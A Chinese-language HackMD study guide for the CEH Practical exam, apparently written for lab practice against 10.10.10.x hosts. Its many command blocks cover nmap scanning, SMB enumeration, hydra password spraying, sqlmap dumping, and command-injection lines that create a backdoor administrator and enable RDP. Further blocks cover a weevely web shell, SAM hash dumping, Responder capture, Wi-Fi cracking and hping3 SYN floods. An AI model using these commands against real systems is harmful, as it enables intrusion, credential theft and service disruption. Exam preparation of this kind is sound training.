:::warning
考試流程【[細節分享](https://hackmd.io/@nfu-johnny/SyzXWPp5A)】
1.收郵件點選會議室連結
2.安裝桌面版會議程式後進入會議室
3.監考官要求鏡頭檢視雙證件、照環境
4.監考官要求開啟控制台
5.監考官要求開aspen網頁,給一組帳密,登入考試平台
:::
:::info
* 跟原廠約時間,6個小時LAB考試(20題,至少通過14題)
* CEH是學科、CEHP是術科,兩者均通過,可拿CEH Master
* CEH、CEH Master是資安院證照清單
* 但CEHP不是,只考過CEHP不被承認
* CEHv12課本章節關連性(01、02、09、19不用看、10主要看流量分析的部分)
* 考試環境只提供兩個機器:Windows/Parrot
* 考試網站: https://proctor.examspecialists.com/
* [資安證照地圖](https://pauljerimy.com/security-certification-roadmap/)
* 心得系列
* [Certified Ethical Hacker Practical Exam Guide](https://medium.com/techiepedia/certified-ethical-hacker-practical-exam-guide-dce1f4f216c9)
* [EC-Council CEH Practical / Master 準備心得 — 讓理論與實作相輔相成的學習](https://medium.com/blacksecurity/ceh-practical-master-3e80cac180a2)
* [EC-Council CEHP考試準備心得](https://hackmd.io/@9dCJrgb6QHGd8dRfgHO0zg/r14xNn1po)
* [EC-Council CEH Practical 準備及考試心得](https://austinstunia.medium.com/ec-council-ceh-practical-%E6%BA%96%E5%82%99%E5%8F%8A%E8%80%83%E8%A9%A6%E5%BF%83%E5%BE%97-1eeac92e6855)
* Cheat Sheet
* [CEH-Practical-Notes](https://github.com/infovault-Ytube/CEH-Practical-Notes)
* [CEH-Practical-Notes-and-Tools](https://github.com/DarkLycn1976/CEH-Practical-Notes-and-Tools)
* [CEH-v12-Practical](https://github.com/hunterxxx/CEH-v12-Practical)
* [CTFDemo](https://github.com/brucelyc/CTF_Memo)
* [Everything You Need](https://github.com/dhabaleshwar/CEHPractical/blob/main/Everything%20You%20Need.md)
* [AK0M01/Ceh-Practical](https://github.com/AK0M01/Ceh-Practical)
* [Certified Ethical Hacker (C|EH)(Practical)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical)
* 參考影片
* [How To Pass CEH Practical V12 Questions Solved](https://youtu.be/R9ZPkpKkzEA?si=xcENBWsaNikGjNxp)
* [CEHv12 Complete Playist](https://youtube.com/playlist?list=PLZFqXXGzox9mcgT_eMh1Jt-bbD_5kY_u-&si=Gu1vlLBEi17C8gGj)
* [CEHv12 LABS](https://www.youtube.com/playlist?list=PLQutQhatpiPdi3acYayu9mSnKXDuLMuD1)
* [CEH Practical Complete Playlist](https://www.youtube.com/playlist?list=PLZEA2EJpqSWfouVNPkl37AWEVCj6A2mdz)
* [CEHv12 Practical ILabs Walkthroughs](https://youtube.com/playlist?list=PL-Fa25Pu8l6wV1Se-bPY-Onc6t_mUTZHW&si=L4bsIVfjnWWgqQjU)
:::
* 課程教材分成四個主題
## 一、掃描列舉
:::info
對應到CEH課本3~5章
Module 3 - Scanning
* Scanning tools are used to scan and identify ==live hosts==, ==open ports==, ==running services on a target network==, ==location info==, ==NetBIOS info==, and ==information about all TCP/IP and UDP open ports==.
* **Nmap** ("Network Mapper") is a security scanner for network exploration and hacking.
* Hping3 is a command-line-oriented network scanning and packet crafting tool for the TCP/IP protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols.
* Metasploit
Module 4 - Enumeration
Module 5 - Vulnerablility Analysis
:::
* 工具:nmap
* 情境:不同網段尋找目標
* 語法:`nmap <options> <Target IP address>`
### 1-1 尋找存活的主機 Host Discovery
:::info
* Host discovery is the first step in network scanning.
* Host discovery provides an accurate status of the systems in the network, which enables an attacker to avoid scanning every port on every system in a list of IP addresses to identify whether the target host is up.
:::
**教材指令**
```bash
# 區網內掃描會直接使用arp scan,若要強制使用ICMP Ping、TCP Ping或UDP Ping要另外下參數
nmap -sn 10.10.10.*
# 結果與上述出現台數不同,多出一台gateway網路設備
sudo nmap -sn 10.10.10.*
# 可以用ip route查看設備IP
ip route
# --reason
nmap -sn 10.10.10.* --reason
sudo nmap -sn 10.10.10.* --reason
# --packet-trace
sudo nmap -sn 10.10.10.* --packet-trace
sudo namp -sn scanme.nmap.org --packet-trace
```
### 1-2 尋找主機有服務的端口(埠號) Port Scaning
:::info
Port scanning is the process of scanning system ports to recognize open ones. It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. If attackers recognize an unused open port, they can exploit it to intrude into the system.
:::
**教材指令**
```bash
# 掃常用Port
nmap 10.10.10.9
# 全掃
nmap -p- 10.10.10.9
# UDP Scan需要sudo權限
sudo nmap 10.10.10.16 -sU -p53,137-139,161,1900,5353
# WAMP案例掃PORT建議(也可能要掃8080)(考點)
nmap -p80,3306 10.10.10.* --open --reason
nmap -p80,3306 10.10.10.* --open --reason --packet-trace
```
不常用的端口
### 1-3 識別作業系統及服務版本 Service and OS Discovery
> /usr/share/nmap/nmap-os-db
**教材指令**
```bash
sudo nmap 10.10.10.16 -O
sudo nmap 10.10.10.9 -O
# 看到服務版本去找Exploit機會或搭配metasploite
# apache 2.4.41 vulnerability exploitdb
sudo nmap 10.10.10.9 -p80 -sV
sudo nmap 10.10.10.9 -p80 -A
# 找AD主機
sudo nmap 10.10.10.* -p389,636 --open
# 找Domain Controller的FQDN(考點)
sudo nmap 10.10.10.16 -p445,389 -A
sudo nmap 10.10.10.16 -p445,3389 -sVC
# 結合CEH課文參考精準解法,直接可以查到FQDN
sudo nmap 10.10.10.16 --script smb-os-discovery
```
> 
> Windows識別作業系統:`nmap --script smb-os-discovery <target>`
> 
> (自我補充)在AD主機可以可以用以下指令查DC清單
> `nltest /dclist:<domain_name>`
> 
### 1-4 列舉服務細節資訊 Enumeration
:::info
主要結合CEH課文以下章節主題
* Module 04 - Enumeration:SNMP Enumeration (snmp-win32-users)、SMB Enumeration (enum4linux)
* Module 06 - System Hacking:Password-Cracking Tools (THC-Hydra)、Password Spraying Attack (CrackMapExec)
:::
> [Felo搜尋-krbtgt帳號](https://felo.ai/search/oXGqXU39bwnfPckqaye-V)
> [Quick Tutorial: SNMP Enumeration](https://allabouttesting.org/quick-tutorial-snmp-enumeration/)
> [Hydra-Cheatsheet](https://github.com/frizb/Hydra-Cheatsheet)
**教材指令**
```bash
sudo nmap -sU -p161 --open 10.10.10.*
sudo nmap -sU -p161 -sC 10.10.10.16
sudo nmap -sU -p161 --script snmp-win32-users 10.10.10.16
<將找到的user帳號建在一個win32-users.txt>
nbtscan 10.10.10.1-254
enum4linux 10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
enum4linux -u martin -p apple -a 10.10.10.16 > day1lab4
# 確認impacket套件是否在0.10以上
python3 -m pip list | grep impacket
# 為了使用CrackMapExec工具,要升級套件
python3 -m pip install --upgrade impacket
# Enumerating SMB Shares
crackmapexec smb 10.10.10.16 -u martin -p apple --shares
```
> impacket套件要在0.10以上才能使
> 
> 在 `/usr/share/nmap/scripts/` 可以找到所有nmap的nse
> 用 snmp 關鍵字可以找到 snmp 列舉可能會用到的 script
> 
> 用 smb-enum 也可以找到 smb 列舉可能會用到的 script
> 
> [CrackMapExec in Action: Enumerating Windows Networks (Part 1)](https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-1-3a6a7e5644e9)
> [CrackMapExec in Action: Enumerating Windows Networks (Part 2)](https://medium.com/r3d-buck3t/crackmapexec-in-action-enumerating-windows-networks-part-2-c61dfb7cd88e)
將找到的user帳號建在一個win32-users.txt
找到jason/qwerty、martin/apple、shiela/test
:::success
`hydra -h` 可以查指令各種參數的使用方式
大寫參數後面通常都是接字典檔,小寫參數後面通常是接己知的字串值
帳號用`-L`或`-l`,密碼用`-P`或`-p`
:::
:::info
* Module 04 - Enumeration
* [Enumerating SMTP Servers with NMAP](https://medium.com/@minimalist.ascent/enumerating-smtp-servers-with-nmap-2a92c7b2c8de)
* [SMTP 伺服器 ETRN 命令未限制](https://zeroday.hitcon.org/vulnerability/ZD-2025-00812)
* Simple Network Management Protocol (SNMP) allows network administrators to manage network devices from a remote location.
* an application-layer protocol that runs on UDP.
* SNMP has many security vulnerabilities, such as a lack of auditing.
* SNMP enumeration is the process of ==creating a list of the user’s accounts and devices== on a target computer using SNMP.
* SNMP employs two types of software components for communication: the SNMP agent and SNMP management station. ==The agent receives requests on port 161 from the managers== and responds to the managers on port 162.
* Server Message Block (SMB) is a transport protocol that is generally used by Windows systems for providing shared access to files, printers, and serial ports as well as remote access to Windows services.
* By default, SMB runs directly on TCP port 445 or via the NetBIOS API on UDP ports 137 and 138 and TCP ports 137 and 139.
* By using the SMB service, users can access files and other data stored at a remote server.
* The SMB service also allows application users to read, write, and modify the files on the remote server.
* A network running this service is highly vulnerable to SMB enumeration, which provides a good amount of information about the target.
* Attackers can use SMB enumeration tools such as Nmap, SMBMap, ==enum4linux==, nullinux, and NetScanTool Pro to perform a directed scan on the SMB service running on port 445.
* ==Enum4linux== is a tool for ==enumerating information from Windows== and Samba systems.
* Module 06 - System Hacking
* Password spraying attack targets multiple user accounts simultaneously using one or a small set of commonly used passwords.
* Attackers use the CrackMapExec tool to automate the password cracking process of an entire domain or workgroup member passwords using a small set of commonly used passwords stored in a .txt file.
:::
## 二、注入攻擊
:::info
搭配章節13~15
:::
### 2-1 IDOR
:::info
參照CEH課文Lab演練第14章
Task 2: Perform Parameter Tampering using Burp Suite
* Insecure Direct Object Reference (IDOR) is a vulnerability that arises when developers disclose references to internal data enforcement objects such as database keys, directories, and other files, which can be exploited by an attacker to modify the references and gain unauthorized access to the data. These IDORs can be bypassed by providing a single parameter name repeatedly but with unique values.
:::
目標:http://10.10.10.19/moviescope
### 2-2 SQL Injection
:::info
參照CEH課文Lab演練第15章
Task 2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
* Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
* You can use sqlmap to perform SQL injection on a target website using various techniques, including Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band SQL injection.
* [sqlmap](https://github.com/sqlmapproject/sqlmap)
* [Damn Small SQLi Scanner](https://github.com/stamparm/DSSS)
:::
* 透過練習1得知注入點
* 可使用sqlmap指令,獲取資料
```bash
# SESSION資訊可以在開發者工具用console指令document.cookie取得
sqlmap -u "注入點url" --cookie="SESSION資訊"
# 資料庫列舉
sqlmap -u "注入點url" --cookie="SESSION資訊" --dbs
# 資料表列舉
sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 --tables
# 取得資料表結構
sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 -T 資料表名稱 --columns --technique=B
# 取得資料表資料內容
sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 -T 資料表名稱 --dump --technique=B
```
* 沒有`--technique=B`會亂碼
* 補充:要進行RCE的話,參數要加上`--os-shell`
* DVWA的SQL Injection:自己練
### 2-3 Comman Injection
:::info
參照CEH課文Lab演練第14章
Task 7: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server
:::
> [Felo搜尋-在CMD開啟RDP服務](https://felo.ai/search/Em-7ro4GpOt0poDWwefDp)
**教材指令**
```
# 利用管線指令
| whoami
# 增加帳號
| net user cehp /add
# 設定密碼
| net user cehp password
# 確定增加的帳號是否存在
| net user
# 指派後門帳號到管理群組
| net localgroup Administrators cehp /add
# 開啟RDP服務 (Google關鍵字:cmd enable rdp service)
| reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 用netstat指令看服務有沒有被開起來
| netstat -an | findstr :3389
<再來就是直接用RDP服務進入>
```
### 2-4 WebShell
:::info
參照CEH課文Lab演練第14章
Task 8: Exploit a File Upload Vulnerability at Different Security Levels
:::
```bash
# 利用weevely產生web shell
weevely generate cehp backdoor.php
<上傳成功後>
weevely http://10.10.10.16:8080/dvwa/hackable/uploads/backdoor.php cehp
```
* 補充:google找simple webshell
> [joswr1ght/easy-simple-php-webshell.php](https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985)
### 2-5 wpscan工具
:::info
參照CEH課文Lab演練第14章
Task 6: Enumerate and Hack a Web Application using WPScan and Metasploit
:::
* 對象:http://10.10.10.16/ceh/
* 這套工具主要對象是wordpress
```bash
whatweb http://10.10.10.16/ceh/
whatweb -v http://10.10.10.16/ceh/
```
* wpscan工具
> [WordPress Vulnerability Testing with Nmap](https://blog.wpsec.com/wordpress-vulnerability-testing-wordpress-with-nmap/)
> [Exploiting WordPress Using WPScan](https://abrictosecurity.com/exploiting-wordpress-using-wpscan/)
```bash
# 查看指令使用方式
wpscan -h
# User IDs range
wpscan --url http://10.10.10.16:8080/ceh -e u
# password attack 利用CEH課本第14章的字典檔可以找到admin的密碼
wpscan --url http://10.10.10.16:8080/ceh -U admin -P password.txt
```
### 2-6 metasploit工具
> [Felo搜尋-metasploit攻擊步驟](https://felo.ai/search/wKAFLrU3VFEEWaZv2UOcS)
> [Metasploit Tutorial 2024: The Complete Beginners Guide](https://www.stationx.net/metasploit-tutorial/)
> [Metasploit For Beginners to Expert](https://youtu.be/bDg0kZ6v3vA?si=2BLOKhSqsRAmGMn9)
> [How to exploit port 80 HTTP on Kali Linux](https://youtu.be/WV4c8aSVXYs?si=PBYs9s1oBfHX5__G)
> CEH
> 
```bash
sudo service postgresql start
msfconsole
```
* 佈置外掛漏洞
> [Photo Gallery <= 1.2.5 - Unrestricted File Upload](https://wpscan.com/vulnerability/c2b4aec5-1f23-443e-a0fc-1237778893e1/)
> 先下載1.2.5有漏洞的外掛版本安裝起來
### 2-7 補充:Android設備
:::info
:::
> 紙本教材沒有,是新題目
> Android Debugging Bridge (ADB)
> [Android adb 基本用法教學](https://shengyu7697.github.io/android-adb/)
```bash
nmap -p5555 10.10.10.* --open
# 考試不用裝
sudo apt install -y adb
adb connect 10.10.10.14:5555
adb devices
adb shell
```
在Android的虛擬機上利用Cx File Explorer在Download資料新增flag.txt檔案(考試時會給檔名,不用自己建檔案)
考試時,會要求填hash值的前幾碼或後幾碼
## 三、破密攻擊
:::info
CEH的第6章
:::
### 3-1 作業系統
* ==Windows系統==
:::info
* [LM, NTLM, Net-NTLMv2, oh my!](https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4)
* Windows uses the Security Accounts Manager (SAM) database or Active Directory Database to manage user accounts and passwords in hashed format (a one-way hash).
> 
* SAM file is stored at %SystemRoot%/system32/config/SAM in Windows systems
* It stores LM or NTLM hashed passwords.
* The SAM file uses an SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.
* NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy.
* To crack LM hashes using John the Ripper
```bash
john --format=LM --show hashfile.txt
```
:::
> [(自我補充)Dumping Hashes from SAM via Registry](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry)
> [ophcrack - Free Rainbow tables](https://ophcrack.sourceforge.io/tables.php)
> This files should be located in `C:\windows\system32\config\SAM` and `C:\windows\system32\config\SYSTEM`. But you cannot just copy them in a regular way because they protected.
>
* 在Win10主機:The easiest way to steal those files is to get a copy from the registry:
```
# 切換到e:\CEH-Tools的資料夾(共享的資料夾)裡
e:
cd CEH-Tools
# 建立一個資料庫
mkdir pwdump
# 將帳號資料庫匯出儲存
reg save hklm\sam pwdump\sam
# 將系統登錄檔匯出儲存
reg save hklm\system pwdump\system
```
> 
* 在parrot主機
> [(自我補充)Dumping credentials with impacket-secretsdump](https://vk9-sec.com/active-directory-dumping-credentials-with-impacket-secretsdump/)
```bash
# 在parrot主機將共享資料夾裡的pwdump資料夾複製到home裡
impacket-secretsdump LOCAL -system pwdump/system -sam pwdump/sam -outputfile pwdump/10.10.10.10
# 再把匯出的資料pwdump/10.10.10.10複製到共享資料夾裡
```
* 在Win10主機裡,教材介紹使用ophcrack
* load > PWDUMP file > 點 Crack 開始破密
* 可善用網路工具
* Google關鍵字:`ntlm crackstation`
* ==Linux系統== - john the ripper
* 自製加密密文
```bash
echo -n hello | md5sum | cut -d ' ' >> md5.txt
echo -n apollo | md5sum | cut -d ' ' >> md5.txt
echo -n tiger | md5sum | cut -d ' ' >> md5.txt
```
* 用john
```bash
# 不知道格式無法破
john md5.txt
# 要指定格式
john md5.txt --format=raw-md5
```
:::success
* [CEHv12課本裡有提到一種提權方式是透過NFS丟bash檔](https://youtu.be/uMUnnRrV3HI?si=Wp0Fpmc5eZCuhcHP)
> [suid提權](https://blog.csdn.net/weixin_46329243/article/details/134481631)
> [Privilege Escalation Basics](https://youtu.be/VuIYNxazbN0?si=HXlegejrNbOqQ6F5)
> [Privilege Escalation Advance](https://youtu.be/eba6zIDzfPg?si=ktAbAEKTga6atK-K)
* Useful cmd's used for "Privilege Escalation".
```bash
# Displays the world executable folders.
find / -perm -o x -type d 2>/dev/null
# Displays the “suid” Bit set files.
find / -perm -u=s -type f 2>/dev/null
```
* 補充情境:要破解系統內其他帳號的密碼
> [Felo搜尋 - unshadow指令是john the ripper提供的指令的工具](https://felo.ai/search/tuucAn0gAciOlOUnh4_M0)
> 
```
sudo su
unshadow /etc/passwd /etc/shadow > mypasswd
john mypasswd --show
```
:::
### 3-2 網路協定
* 破解NetBIOS網路登入密碼 - Responder (舊題目)
:::info
* NBT-NS(NetBIOS Name Service),分別使用不同的埠139或445,目前傾向於使用445埠。
* LLMNR(Link-Local Multicast Name Resolution)被視為NBT-NS服務的延續。
* LLMNR/NBT-NS是一種適用於區域網路的網路名稱解析機制,執行時請求端會以UDP發送多播查詢封包,此查詢會被限制在區域網路內。
> 不是DNS的替代,它是DNS查詢失敗的情況下改進的解決方案
* 攻擊者利用 Responder 截取受害者系統的資訊,例如:OS version, client version, NTLM client IP address, NTLM username, 及 password hash.
* Responder is an LLMNR, NBT-NS, and MDNS poisoner. By default, the tool only responds to a File Server Service request, which is for SMB.
:::
> [Gaining Credentials Easily with Responder Tool](https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b)
> [Local Network Attacks: LLMNR and NBT-NS Poisoning Background](https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning/)
> [(自我補充)SNIFFING AND CRACKING NTLM HASHES](https://hackmd.io/@EvilOrez/ntlm)
* 在parrot
```
sudo responder -I eth0
```
* 在Win10
登入失敗會出現登入對話框輸入supersuper/Password1
:::success
補充
:::
* 在parrot
```bash!
# Responder的log資訊在/usr/share/responder/logs/這個資料夾裡
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
# 準備字典檔
sudo gzip -d /usr/shar/wordlists/rockyou.txt.gz
# 進行破解
# john --wordlist=字典檔 要破解密碼的檔案
john --wordlist=/usr/shar/wordlists/rockyou.txt /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
```
* (番外篇) LLMNR/NBT-NS服務安全性不足,可透過本機群組原則關閉LLMNR、透過網路卡介面設定關閉NBT-NS。
* FTP協定 - hydra
> 運用CEH-Tools 13章的wordlists
```bash
# 找有開FTP的主機
nmap -p21 10.10.10.* --open
hydra -L Wordlists/Usernames.txt -P Wordlist/Passwords.txt ftp://10.10.10.10
ftp 10.10.10.10
```
在Win10加入一個檔案
在parrot端把flag.txt下載下來
> [Felo搜尋-FTP指令參考](https://felo.ai/search/Nf792EUDyYIu2GrKZgihf)
### 3-3 無線網路
:::info
CEH第16章
aircrack-ng指令工具
:::
> [<補充> Aircrack-ng - WiFi 密碼暴力破解](https://youtu.be/Hojxj1H3U_s?si=j7k7HNQ-tQHQmMZy)
```bash
# 可直接破解
aircrack-ng WEPcrack-01.cap
# 不可直接破解
aircrack-ng WPA2crack-02.cap
aircrack-ng WPA2crack-02.cap -w /usr/share/wordlists/nmap.lst
```
CEH課文摘錄
* Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2 PSK cracker, and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows.
* `-w`: specifies the path to a wordlist
* `-a`: specifies the attack mode
> CEH課文的實作是用 `airodump-ng` 側錄封包資訊存檔成 `*.cap` 檔後,再用 `aircrack-ng` 破密
> CEHP考的是給側錄檔,直接用 `aircrack-ng` 破密
> 
> * [補充參考資訊][(雅技資訊日誌) airodump-ng -- 無線網路封包擷取](https://atic-tw.blogspot.com/2014/01/airodump-ng.html)
### 3-4 雜湊及解密
:::info
CEH的第20章
:::
* Cryptanalysis Tools - CrypTool (不會考)
> Triple DES(ECB)
* Attackers use cryptanalysis tools to analyze and break ciphers.
* Disk Encryption Tools - ==VeraCrypt== (會考)
* 會給一個加密的檔案和一組密碼,把檔案掛載起來並從中找到題目指示要找的資訊
* CEH課文摘錄
* Disk encryption is a technology that protects the confidentiality of the data stored on a disk by converting it into an unreadable code using disk encryption software or hardware, thus preventing unauthorized users from accessing it. Disk encryption provides confidentiality and privacy using passphrases and hidden volumes.
* VeraCrypt is software for establishing and maintaining an on-the-fly-encrypted volume (data storage device). In on-the-fly encryption, data are automatically encrypted immediately before saving and decrypted immediately after loading, without any user intervention. No data stored on an encrypted volume can be read (decrypted) without using the correct password/keyfile(s) or correct encryption keys. The entire file system is encrypted (e.g., file names, folder names, free space, metadata, etc.).
* Files can be copied to and from a mounted VeraCrypt volume just like they are copied to/from any normal disk (e.g., by simple drag-and-drop operations). Files are automatically decrypted on the fly (in memory/RAM) while they are read or copied from an encrypted VeraCrypt volume. Similarly, files that are written or copied to the VeraCrypt volume are automatically encrypted on the fly (just before they are written to the disk) in RAM.
* File Fingerprinting - HashMyFiles (不會單獨考,會搭配著用)(不用裝,找到後直接執行)
* CEH課文摘錄:HashMyFiles produces a hash value for a file using MD5, SHA1, CRC32, SHA-256, SHA-512, and SHA-384 algorithms. The program also provides information about the file, such as the full path of the file, date of creation, date of modification, file size, file attributes, file version, and extension, which helps in searching for and comparing similar files.
* [補充] Cryptography Tools - ==BCTextEncoder== (不用裝,找到工具後直接執行)
* 考試給密文和密碼,用工具解密文
* Step 1 加密 (製作密文)
* 加密時輸入一組密碼
* 加密成功時會密文會出現在下方
* Step 2 解密 (載入密文解密,解題的部分)
* 題目給的密文很清楚知道是用什麼工具加密,就要知道用什麼工具解密
* 用工具解密
* CEH課文摘錄:The BCTextEncoder utility simplifies the encoding and decoding of text data. It compresses, encrypts, and converts plaintext data into text format, which the user can then copy to the clipboard or save as a text file. It uses public key encryption methods as well as password-based encryption. Furthermore, it uses strong and approved symmetric and public-key algorithms for data encryption.
### 3-5 資料隱匿
> [Felo搜尋-隱寫術 (Steganography) 的功能](https://felo.ai/search/Kn0wEIYTTlmDkxLKpvPIW)
> 藏頭詩 - 給圖檔要隱藏資訊,使用Steganography Tools
> 工具在CEH的Module 06 Steganography Tools
> 
* https://www.offsec.com/metasploit-unleashed/timestomp/
* 圖片隱寫(Image Steganography) - OpenStego軟體
* 安裝
> 
* Step 1 隱寫資料進圖片(做出有隱藏資訊的圖片)
> 
* Step 2 從圖片萃取隱藏的資訊(解題的部分)
* 留意有可能會更改副檔名,所以要調整載入副檔名的範圍
* 確定要載入的圖片及匯出的位置
* 點選「Extract Data」
* 可提取被隱藏的文字檔
* 文件隱寫(Document Steganography) - Snow工具 (不大會考)
* [FREE STEGANOGRAPHY TOOL TO HIDE MESSAGE IN TEXT USING WHITE SPACES](https://www.ilovefreesoftware.com/01/windows/free-steganography-tool-to-hide-message-in-text-using-white-spaces.html)
* Text-based steganography that uses whitespace to conceal information.
* CEH課文摘錄
* Whitespace steganography is used to ==conceal messages== in ASCII text ==by adding whitespaces== to the ends of the lines.
* Snow is a program ==for concealing messages in text files by appending tabs and spaces to the ends of lines==, and ==for extracting messages from files containing hidden messages==. The user hides the data in the text file by appending sequences of up to ==seven spaces==, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent 0s and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data.
> 
```
SNOW.EXE -C -p ceh -m "Passing score: 70" 原始檔.txt 輸出檔.txt
```
```
SNOW.EXE -C -p ceh 輸出檔.txt
```
## 四、流量分析
:::success
技巧1:Statistics > Protocol Hierarchy
技巧2:Statistics > Coversations
技巧3:Analyze > Follow > TCP Stream (參照CEH第8章)
:::
### 4-1 HTTP分析
:::info
Wireshark安裝工具在CEH第3章
(因為第3章提到「OS Discovery using Wireshark」)
可以透過TTL和TCP Window size等欄位識別OS
WireShark主要課文內容集中在CEH第8章Sniffing
* Snffing Tools:System administrators use automated tools to monitor their network, but attackers misuse these tools to sniff network data.
* Wireshark displays data from the TCP port with a feature known as “Follow TCP stream.”
* To see the TCP stream, select a TCP packet in the packet list of a stream/connection and then select the Follow ➔ TCP Stream menu item from the Wireshark ==Analyze== menu.
:::
* Statistics > Protocol Hierarchy
### 4-2 後門程式(Trojan)
:::info
Trojans(後門程式/惡意程式)在CEH第7章
[njRAT工具](https://felo.ai/search/Y2eKs-CRhza4jaJw3ZPOx)
這題不是考分析流量,而是考如何用njRAT連線遠端已經被植入後門程式的受害機器找檔案。
:::
Statistics > Coversations
考試要找關鍵檔案,並download到本機端去找答案
### 4-3 分析Covert TCP流量 (不會考)
### 4-4 分析Syn Flood
:::info
:::
* parrot主機 (考試時用不到,不用記)
```bash
# SYN flooding a victim
# --flood:sent packets as fast as possible
#
# --rand-source:using random source address mode
# CEHP教材示範,CEH課本(本文未提,但在LAB裡有提到)
hping3 --flood --rand-source -S -p 21 10.10.10.10
# -a <ip_address> or --spoof <ip_address>:spoof source address
# CEHP教材沒有,老師額外補充,但CEH課本本文有提及(在Module 03)
hping3 --flood -a 10.10.10.9 -S -p 21 10.10.10.10
```
* win10主機封包測錄,分別存檔後比較兩者差異 (考試時用不到,會給測錄檔直接分析)
* 透過測錄所得的資訊,分析受害方哪個IP以及被攻擊的Port是哪一個?
* 技巧:利用 Statistics > Coversations
### 4-5 分析 modbus (工控)
:::info
Module 18 IoT and OT Hacking
* Modbus is a ==serial communication protocol== that is ==used with PLCs== and enables communication between many devices connected to the same network.
* serial communication protocol:通常使用RS232/RS485介面
* 可程式邏輯控制器(PLC)
* Attackers use wireshark to capture and analyze Modbus/TCP traffic on industrial networks.
* Modbus/TCP does not have any in-built encryption or security features, so attackers can easily gather information from the data packets being transmitted between the network and a Modbus port on a device.
* 通常不進行加密
* 許多Modbus設備缺乏有效的使用者認證機制
:::
* [封包側錄檔載點](https://github.com/ITI/ICS-Security-Tools/blob/master/pcaps/bro/modbus/modbus.pcap)
* Statistics > Protocol Hierarchy
* filter:modbus、modbus.func_code==1
* [modbus function code](https://felo.ai/search/shTci4feDgM2wK-ppsVLO)
### 4-6 補充:分析IoT
:::info
Module 18 IoT and OT Hacking
* Message Queuing Telemetry Transport (MQTT) is an ISO standard lightweight protocol used to transmit messages for ==long-range wireless communication==. It helps in establishing connections to remote locations, for example via satellite links.
* Port 1883 is the default MQTT port
:::
> [一次弄懂 MQTT !物聯網通訊協定全面指南](https://resource.webduino.io/blog/mqtt-guide)
> [[物聯網協定與資安的距離] MQTT 通訊協定淺談](https://medium.com/h1dra-security-team/%E7%89%A9%E8%81%AF%E7%B6%B2%E5%8D%94%E5%AE%9A%E8%88%87%E8%B3%87%E5%AE%89%E7%9A%84%E8%B7%9D%E9%9B%A2-mqtt-%E9%80%9A%E8%A8%8A%E5%8D%94%E5%AE%9A%E6%B7%BA%E8%AB%87-52d76ddc6ce6)
> [MQTT基本介紹](https://youtu.be/N_HQ2GLZqoI?si=LfIiRC-BszLn2OLz)
> [How to Use Wireshark for MQTT Analysis: An In-depth Guide](https://cedalo.com/blog/wireshark-mqtt-guide/)
* Google關鍵字:MQTT pcap
* [封包側錄檔載點](https://github.com/pradeesi/MQTT-Wireshark-Capture/blob/master/mqtt_packets_tcpdump.pcap)
* Statistics > Protocol Hierarchy
* filter:mqtt
* 注意Publish message:`mqtt.msgtype == 3`
* Analyze > Follow > TCP Stream
## 補充
* 惡意程式分析:PEiD工具(Portable Executable Identifier)
:::info
CEH的第7章
`E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools\PEid`
:::
* 對照CEH課本練習 (Identify Packaging and Obfuscation Methods using PEid)
> Packaging 加殼
> Obfuscation 混淆
> Attackers often use packing and obfuscation or a packer to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file, and then runs the unpacked file.
* displays the type of packer used in packing a program
* 考試要你回答 Entrypoint 值
* [行為分析-成為逆向大師的第一步-秒懂加殼技術](https://ithelp.ithome.com.tw/articles/10188209)
> 一般而言,殼會在軟體被載入後先執行,來對原本的程式碼解密或還原,解殼後才會進入到原本程式真正要開始執行的地方(Orginal Entry Point;OEP)。
* [PEiD主要的功能](https://felo.ai/search/RGkYWRa-6J16ufLhcwbbT)
* 弱點掃描:OpenVAS
:::info
CEH的第5章
https://127.0.0.1:9392/login
admin/password
:::
Sign in with Wallet
Connect another wallet